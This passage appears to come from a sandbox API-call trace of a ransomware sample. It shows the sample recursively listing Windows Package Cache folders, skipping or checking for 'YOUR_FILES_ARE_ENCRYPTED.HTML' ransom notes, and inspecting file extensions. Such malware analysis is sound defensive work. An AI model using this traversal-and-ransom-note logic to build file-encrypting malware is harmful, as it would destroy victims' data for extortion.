ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69df918b, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", cAlternateFileName="{6913E~1")) returned 1 [0110.502] StrStrIW (lpFirst="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.502] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 75 [0110.502] GetProcessHeap () returned 0x600000 [0110.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.503] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}" [0110.503] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*" [0110.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafd3101d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0110.503] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafd3101d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.503] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xad482581, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x320, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0110.503] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.503] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\state.rsm") returned 85 [0110.503] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.503] lstrlenW (lpString=".rsm") returned 4 [0110.503] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0110.503] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69df918b, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69df918b, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x672872b5, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x9e218, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="VC_redist.x64.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0110.503] StrStrIW (lpFirst="VC_redist.x64.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.503] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\VC_redist.x64.exe") returned 93 [0110.503] PathFindExtensionW (pszPath="VC_redist.x64.exe") returned=".exe" [0110.503] lstrlenW (lpString=".exe") returned 4 [0110.503] PathFindExtensionW (pszPath="VC_redist.x64.exe") returned=".exe" [0110.503] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafd2e8e4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafd2e8e4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe28cd2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.503] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafd2e8e4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafd2e8e4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe28cd2, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.503] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0110.503] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.503] GetProcessHeap () returned 0x600000 [0110.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.504] GetProcessHeap () returned 0x600000 [0110.504] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.504] GetProcessHeap () returned 0x600000 [0110.504] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.505] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", cAlternateFileName="{7D0B7~1.285")) returned 1 [0110.505] StrStrIW (lpFirst="{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.505] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508") returned 87 [0110.505] GetProcessHeap () returned 0x600000 [0110.505] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.506] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508" [0110.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*" [0110.506] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafe59a10, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.506] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec09f7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafe59a10, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.506] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x69ec4518, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="packages", cAlternateFileName="")) returned 1 [0110.506] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.506] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages") returned 96 [0110.506] GetProcessHeap () returned 0x600000 [0110.506] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.507] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages" [0110.507] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*" [0110.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafe4fde9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3dd8, dwReserved1=0x6f3d28, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.507] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x69ec4518, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xafe4fde9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3dd8, dwReserved1=0x6f3d28, cFileName="..", cAlternateFileName="")) returned 1 [0110.507] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafe85905, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe85905, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f3dd8, dwReserved1=0x6f3d28, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0110.507] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.507] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64") returned 122 [0110.507] GetProcessHeap () returned 0x600000 [0110.507] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.508] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64" [0110.508] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*" [0110.508] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafe85905, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe85905, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName=".", cAlternateFileName="")) returned 0x626638 [0110.508] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x69ec4518, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xafe85905, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe85905, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName="..", cAlternateFileName="")) returned 1 [0110.509] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5b500, ftCreationTime.dwHighDateTime=0x1d5c5bd, ftLastAccessTime.dwLowDateTime=0x4f5b500, ftLastAccessTime.dwHighDateTime=0x1d5c5bd, ftLastWriteTime.dwLowDateTime=0xb0290a38, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x55f0fd, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName="cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03", cAlternateFileName="CAB1CA~1.70D")) returned 1 [0110.509] StrStrIW (lpFirst="cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.509] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03") returned 196 [0110.509] PathFindExtensionW (pszPath="cab1.cab.70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03") returned=".70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03" [0110.509] lstrlenW (lpString=".70D1F2F7401E527306EC818F9ED326093C55D49B04D4A3C68B5C9FC28A951B03") returned 65 [0110.509] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54d47c00, ftCreationTime.dwHighDateTime=0x1d5c5bd, ftLastAccessTime.dwLowDateTime=0x54d47c00, ftLastAccessTime.dwHighDateTime=0x1d5c5bd, ftLastWriteTime.dwLowDateTime=0x54d47c00, ftLastWriteTime.dwHighDateTime=0x1d5c5bd, nFileSizeHigh=0x0, nFileSizeLow=0x2d000, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName="vc_runtimeAdditional_x64.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0110.509] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.509] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 151 [0110.509] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.509] lstrlenW (lpString=".msi") returned 4 [0110.509] PathFindExtensionW (pszPath="vc_runtimeAdditional_x64.msi") returned=".msi" [0110.509] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe44e01, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe44e01, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe4c33d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.509] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe44e01, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe44e01, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe4c33d, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x63b458, dwReserved1=0x6f3d30, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.509] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0110.509] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 152 [0110.509] GetProcessHeap () returned 0x600000 [0110.509] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.509] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\vcRuntimeAdditional_amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\packages\\vcruntimeadditional_amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.509] GetProcessHeap () returned 0x600000 [0110.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.509] GetProcessHeap () returned 0x600000 [0110.509] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.510] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe4fde9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe4fde9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe53951, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3dd8, dwReserved1=0x6f3d28, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.510] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe4fde9, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe4fde9, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe53951, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x6f3dd8, dwReserved1=0x6f3d28, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.510] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.510] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0110.510] GetProcessHeap () returned 0x600000 [0110.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{7D0B74C2-C3F8-4AF1-940F-CD79AB4B2DCE}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\{7d0b74c2-c3f8-4af1-940f-cd79ab4b2dce}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.511] GetProcessHeap () returned 0x600000 [0110.511] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.511] GetProcessHeap () returned 0x600000 [0110.511] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.511] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe5885c, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xafe5885c, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xafe5d593, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x628eb0, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.511] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafe5885c, 